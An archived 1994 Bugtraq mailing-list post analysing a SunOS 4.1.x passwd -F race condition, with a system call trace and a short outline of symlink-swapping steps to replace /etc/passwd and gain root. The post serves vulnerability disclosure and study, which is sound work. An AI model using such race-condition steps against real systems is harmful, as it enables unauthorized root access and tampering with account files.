Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Sun Patch Id #102060-01
From: mouse () Collatz McRCIM McGill EDU (der Mouse)
Date: Mon, 19 Dec 1994 04:30:38 -0500


So does anybody know more about this one???  I've tried a few things,
but haven't figured it out yet.  [...]

Problem Description: 

   1169007: Security: Root access possible on SunOS 4.1.x via forced passwd
            race condition.

   This patch restricts the use of the passwd command's -F option [...]

I just now did a simple experiment: I copied /etc/passwd to /tmp/gleep
and ran "passwd -F /tmp/gleep" under the control of trc.  Here's the
trace, edited to emphasize the relevant excerpts:

        open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 3
[this is the first time /tmp/gleep appears in the trace]
        fstat (3, 0xf7fff704) = 0
        read (3, 0xc708, 8192) = 448: [the passwd file]
        close (3) = 0
        gethostname (0x9ae0, 64) = 0: [our hostname]
        ioctl (1, 0x40125401=TCGETA, 0xf7ffefe4) = 0: tio=[...]
        write (1, 0xf78028d0="Changing password for mouse on [hostname].\n", 58) = 58
        access (0xf77247d7="/etc/security/passwd.adjunct", 0x0=F_OK) = -1 ENOENT (No such file or directory)
[I don't know how this may interact with shadow passwords.]
        open (0xf7723ae5="/dev/tty", 0x0=O_RDONLY) = 3
        [catch SIGINT]
        [frob tty settings]
        [read new password]
        [do it all over again, for second copy of new password]
        [do a bunch of signal stuff: SIGHUP, SIGINT, SIGQUIT, SIGTSTP]
        umask (0000) = 0022
        open (0xcb80="/tmp/ptmp", 0xa01=O_WRONLY|O_CREAT|O_EXCL, 0644) = 3
[experimentation indicates the directory portion is taken from
/tmp/gleep's directory portion]
        getdtablesize () = 64
        setrlimit (0x0=RLIMIT_CPU, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
        setrlimit (0x1=RLIMIT_FSIZE, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
        open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 4
        fstat (4, 0xf7fff7dc) = 0
        read (4, 0xcb98, 8192) = 448: [the passwd file]
        fstat (3, 0xf7fff058) = 0
        read (4, 0xcb98, 8192) = 0: 
        close (4) = 0
        write (3, 0xeba0=[the passwd file with modified entry], 448) = 448
        close (3) = 0
        rename (0xcb80="/tmp/ptmp", 0xf7fffa2e="/tmp/gleep") = 0

Thus, my idea of how one can exploit this is [note: this is not an
exploit script!] would be:
        % mkdir bar
        % cp /etc/passwd bar
        [edit bar/passwd to have a known root password]
        % ln -s /etc foo
        % passwd -F $cwd/foo/passwd
Now, you need to relink foo to point to bar, somewhere between the open
of $cwd/foo/ptmp and the open of $cwd/tmp/passwd, and then relink it
back before the rename() occurs.  If the passwd file is large, hitting
the second window may not be hard.

                                        der Mouse

                            mouse () collatz mcrcim mcgill edu



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]